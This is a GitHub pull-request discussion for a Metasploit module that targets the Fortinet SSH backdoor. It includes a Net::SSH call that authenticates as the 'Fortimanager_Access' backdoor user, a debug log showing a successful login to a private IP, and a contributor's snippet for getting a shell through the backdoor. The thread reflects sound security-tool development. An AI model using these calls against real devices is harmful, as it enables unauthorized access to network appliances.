Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Fortinet backdoor #6612

Merged
merged 1 commit into from Feb 29, 2016
Merged

Add Fortinet backdoor #6612

merged 1 commit into from Feb 29, 2016

Conversation

wvu
Copy link
Contributor

@wvu wvu commented Feb 26, 2016

WIP. Finishing up module.

Test with Net::SSH.start(host, 'Fortimanager_Access', auth_methods: ['fortinet-backdoor'], verbose: :debug); nil in irb.

Resolves #6463.

@wchen-r7
Copy link
Contributor

@wvu-r7 Very smart patching from net/ssh. IMO, if the custom_handler method is specific to the Fortinet backdoor, then you might want to consider placing that patch in the module, or in a mixin. lib/net/ssh/authentication/methods feels rather generic?

@nixawk
Copy link
Contributor

nixawk commented Feb 26, 2016

good +1

[1] pry(#<Msf::Ui::Console::CommandDispatcher::Core>)> host = '192.168.1.100'
=> "192.168.1.100"
[2] pry(#<Msf::Ui::Console::CommandDispatcher::Core>)> Net::SSH.start(host, 'Fortimanager_Access', auth_methods: ['fortinet-backdoor'], verbose: :debug)
D, [2016-02-26T23:08:21.847504 #368] DEBUG -- net.ssh.transport.session[3fee2e2dbe08]: establishing connection to 192.168.1.100:22
D, [2016-02-26T23:08:21.849272 #368] DEBUG -- net.ssh.transport.session[3fee2e2dbe08]: connection established
I, [2016-02-26T23:08:21.849401 #368]  INFO -- net.ssh.transport.server_version[3fee2e2d3460]: negotiating protocol version
D, [2016-02-26T23:08:21.850177 #368] DEBUG -- net.ssh.transport.server_version[3fee2e2d3460]: remote is `SSH-2.0-8QX-z'
D, [2016-02-26T23:08:21.850231 #368] DEBUG -- net.ssh.transport.server_version[3fee2e2d3460]: local is `SSH-2.0-OpenSSH_5.0'
D, [2016-02-26T23:08:21.850697 #368] DEBUG -- socket[3fee2e2da440]: read 608 bytes
D, [2016-02-26T23:08:21.850819 #368] DEBUG -- socket[3fee2e2da440]: received packet nr 0 type 20 len 604
I, [2016-02-26T23:08:21.850896 #368]  INFO -- net.ssh.transport.algorithms[3fee2e2b76c0]: got KEXINIT from server
I, [2016-02-26T23:08:21.851097 #368]  INFO -- net.ssh.transport.algorithms[3fee2e2b76c0]: sending KEXINIT
D, [2016-02-26T23:08:21.851259 #368] DEBUG -- socket[3fee2e2da440]: queueing packet nr 0 type 20 len 716
D, [2016-02-26T23:08:21.851400 #368] DEBUG -- socket[3fee2e2da440]: sent 720 bytes
I, [2016-02-26T23:08:21.851435 #368]  INFO -- net.ssh.transport.algorithms[3fee2e2b76c0]: negotiating algorithms
D, [2016-02-26T23:08:21.851551 #368] DEBUG -- net.ssh.transport.algorithms[3fee2e2b76c0]: negotiated:
* kex: diffie-hellman-group-exchange-sha1
* host_key: ssh-rsa
* encryption_server: aes128-cbc
* encryption_client: aes128-cbc
* hmac_client: hmac-sha1
* hmac_server: hmac-sha1
* compression_client: none
* compression_server: none
* language_client: 
* language_server: 
D, [2016-02-26T23:08:21.851576 #368] DEBUG -- net.ssh.transport.algorithms[3fee2e2b76c0]: exchanging keys
D, [2016-02-26T23:08:21.851760 #368] DEBUG -- socket[3fee2e2da440]: queueing packet nr 1 type 34 len 20
D, [2016-02-26T23:08:21.851796 #368] DEBUG -- socket[3fee2e2da440]: sent 24 bytes
D, [2016-02-26T23:08:21.896787 #368] DEBUG -- socket[3fee2e2da440]: read 152 bytes
D, [2016-02-26T23:08:21.896944 #368] DEBUG -- socket[3fee2e2da440]: received packet nr 1 type 31 len 148
D, [2016-02-26T23:08:21.902222 #368] DEBUG -- socket[3fee2e2da440]: queueing packet nr 2 type 32 len 140
D, [2016-02-26T23:08:21.902297 #368] DEBUG -- socket[3fee2e2da440]: sent 144 bytes
D, [2016-02-26T23:08:21.903646 #368] DEBUG -- socket[3fee2e2da440]: read 336 bytes
D, [2016-02-26T23:08:21.903744 #368] DEBUG -- socket[3fee2e2da440]: received packet nr 2 type 33 len 316
D, [2016-02-26T23:08:21.905118 #368] DEBUG -- socket[3fee2e2da440]: queueing packet nr 3 type 21 len 20
D, [2016-02-26T23:08:21.905296 #368] DEBUG -- socket[3fee2e2da440]: sent 24 bytes
D, [2016-02-26T23:08:21.905367 #368] DEBUG -- socket[3fee2e2da440]: received packet nr 3 type 21 len 12
D, [2016-02-26T23:08:21.905767 #368] DEBUG -- net.ssh.authentication.session[3fee2fe93380]: beginning authentication of `Fortimanager_Access'
D, [2016-02-26T23:08:21.906440 #368] DEBUG -- socket[3fee2e2da440]: queueing packet nr 4 type 5 len 28
D, [2016-02-26T23:08:21.906504 #368] DEBUG -- socket[3fee2e2da440]: sent 52 bytes
D, [2016-02-26T23:08:21.947348 #368] DEBUG -- socket[3fee2e2da440]: read 52 bytes
D, [2016-02-26T23:08:21.947489 #368] DEBUG -- socket[3fee2e2da440]: received packet nr 4 type 6 len 28
D, [2016-02-26T23:08:21.947611 #368] DEBUG -- net.ssh.authentication.session[3fee2fe93380]: trying fortinet-backdoor
D, [2016-02-26T23:08:21.947695 #368] DEBUG -- net.ssh.authentication.methods.fortinet_backdoor[3fee2fe879b8]: Sending SSH_MSG_USERAUTH_REQUEST
D, [2016-02-26T23:08:21.947784 #368] DEBUG -- socket[3fee2e2da440]: queueing packet nr 5 type 50 len 92
D, [2016-02-26T23:08:21.947879 #368] DEBUG -- socket[3fee2e2da440]: sent 116 bytes
D, [2016-02-26T23:08:21.948200 #368] DEBUG -- socket[3fee2e2da440]: read 68 bytes
D, [2016-02-26T23:08:21.948262 #368] DEBUG -- socket[3fee2e2da440]: received packet nr 5 type 60 len 44
D, [2016-02-26T23:08:21.948305 #368] DEBUG -- net.ssh.authentication.methods.fortinet_backdoor[3fee2fe879b8]: Received SSH_MSG_USERAUTH_INFO_REQUEST
D, [2016-02-26T23:08:21.948329 #368] DEBUG -- net.ssh.authentication.methods.fortinet_backdoor[3fee2fe879b8]: Sending SSH_MSG_USERAUTH_INFO_RESPONSE
D, [2016-02-26T23:08:21.948421 #368] DEBUG -- socket[3fee2e2da440]: queueing packet nr 6 type 61 len 76
D, [2016-02-26T23:08:21.948533 #368] DEBUG -- socket[3fee2e2da440]: sent 100 bytes
D, [2016-02-26T23:08:21.948705 #368] DEBUG -- socket[3fee2e2da440]: read 36 bytes
D, [2016-02-26T23:08:21.948758 #368] DEBUG -- socket[3fee2e2da440]: received packet nr 6 type 52 len 12
D, [2016-02-26T23:08:21.948808 #368] DEBUG -- net.ssh.authentication.methods.fortinet_backdoor[3fee2fe879b8]: Received SSH_MSG_USERAUTH_SUCCESS

@wvu-r7 How to gain a new shell for fortigate ssh backdoor ?

ssh_socket = Net::SSH.start('192.168.1.100', 'Fortimanager_Access', auth_methods: ['fortinet-backdoor'], verbose: :debug)
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
s = start_session(self, nil, {}, false, conn.lsock)

[2] pry(#<Msf::Ui::Console::CommandDispatcher::Core>)>ssh_socket = Net::SSH.start('192.168.1.100', 'Fortimanager_Access', auth_methods: ['fortinet-backdoor'], verbose: :debug)
[3] pry(#<Msf::Ui::Console::CommandDispatcher::Core>)> ssh_socket.exec!("show system interface")
=> "Unknown admin user ''\n"
[4] pry(#<Msf::Ui::Console::CommandDispatcher::Core>)> ssh_socket.exec!("?")
=> "Unknown admin user ''\n"
[5] pry(#<Msf::Ui::Console::CommandDispatcher::Core>)> ssh_socket.exec!("help")
=> "Unknown admin user ''\n"

@wvu
Copy link
Contributor Author

wvu commented Feb 26, 2016

@all3g: Still working that part out. I don't think you can use CommandStream, since that sends an exec channel request (typically with /bin/sh), and we want shell.

@sempervictus
Copy link
Contributor

@wvu-r7: neat implementation, though i agree we should try to stay as far away from alterations to net/ssh itself as we can. ideally some day we will not need our own version because we will have proper integration. Any chance we can do something clever like extend the SSH object after creation instead of altering its library?
You can look @ metassh for examples of sessions similar to meterp on ssh, though i wouldn't suggest implementing yet unless you have a clear picture of how - metassh is a bit hacky, though has some clever ideas for dealing with these channelized transports. You might also be running into the receiving end expecting slightly different behavior on session init than the default client provides...

@wvu
Copy link
Contributor Author

wvu commented Feb 27, 2016

Sigh #6463 (comment)

Like I said, WIP. I'm already looking into overriding the KeyboardInteractive class, but I kinda need a module first. This was a first step.

Originally, I was modifying the class directly, but I figured adding my own auth method would be less intrusive. Next step is to put it all in the module.

P.S. Does anybody read the original ticket? :)

@wvu wvu added the blocked Blocked by one or more additional tasks label Feb 27, 2016
@wvu
Copy link
Contributor Author

wvu commented Feb 28, 2016

Dumped it all in my module. Working as expected. Will toy with a mixin. Expect an update on Monday. Thanks!

@wvu wvu force-pushed the feature/fortigate branch 2 times, most recently from 281714d to a085ac1 Compare February 29, 2016 16:41
@wvu
Copy link
Contributor Author

wvu commented Feb 29, 2016

Moving this to LoginScanner is also on the list of things to do.

@wvu wvu force-pushed the feature/fortigate branch 2 times, most recently from 51af295 to df6fe0a Compare February 29, 2016 16:57
@wchen-r7 wchen-r7 self-assigned this Feb 29, 2016
@wvu wvu force-pushed the feature/fortigate branch 2 times, most recently from 8584fdc to b9e9ad4 Compare February 29, 2016 17:55
@wvu
Copy link
Contributor Author

wvu commented Feb 29, 2016

Turns out overriding KeyboardInteractive is a recipe for disaster. :)

@wvu wvu force-pushed the feature/fortigate branch 2 times, most recently from 53d7033 to 876ac75 Compare February 29, 2016 17:59
wchen-r7 added a commit that referenced this pull request Feb 29, 2016
@wchen-r7
Land #6612, Add aux module for Fortinet backdoor
2950996
@wvu wvu force-pushed the feature/fortigate branch 2 times, most recently from bd6958b to bb1a1df Compare February 29, 2016 18:05
wvu added a commit to wvu/metasploit-framework that referenced this pull request Feb 29, 2016
@wvu
Land rapid7#6612, missing commits included
a6a37b3
@wvu wvu merged commit 300fdc8 into rapid7:master Feb 29, 2016
wvu added a commit that referenced this pull request Feb 29, 2016
@wvu
Land #6612, one final missing change
c5a9d59
@wvu
Copy link
Contributor Author

wvu commented Feb 29, 2016

Thanks for the merge, @wchen-r7. We'll work on getting a session in another PR.

@wvu wvu deleted the feature/fortigate branch March 1, 2016 16:11
@nixawk
Copy link
Contributor

nixawk commented Mar 3, 2016

@wvu-r7 Good man !

wvu added a commit to wvu/metasploit-framework that referenced this pull request Mar 14, 2016
@wvu
Fix rapid7#6612, overlooked fixes for Fortinet backdoor
17e3a67
wvu added a commit that referenced this pull request May 17, 2016
@wvu
Fix #6612, syntax fixes for fortinet_backdoor
fda4eb4
This was referenced Feb 21, 2018
Merged
Closed
Merged
Merged
wvu added a commit to wvu/metasploit-framework that referenced this pull request Feb 21, 2018
@wvu
Use start_session in fortinet_backdoor
854ac67 
Still get "Unknown admin user ''" from a shell channel request,
@busterb's more complete implementation notwithstanding.

Hoping we fix this in a subsequent commit or related PR.

Please see rapid7#6612 and rapid7#9524.
@wvu wvu mentioned this pull request Sep 6, 2018
Merged
3 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wchen-r7 wchen-r7

Labels
blocked Blocked by one or more additional tasks feature library module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
5 participants
@wvu @wchen-r7 @nixawk @sempervictus @waffleio-r7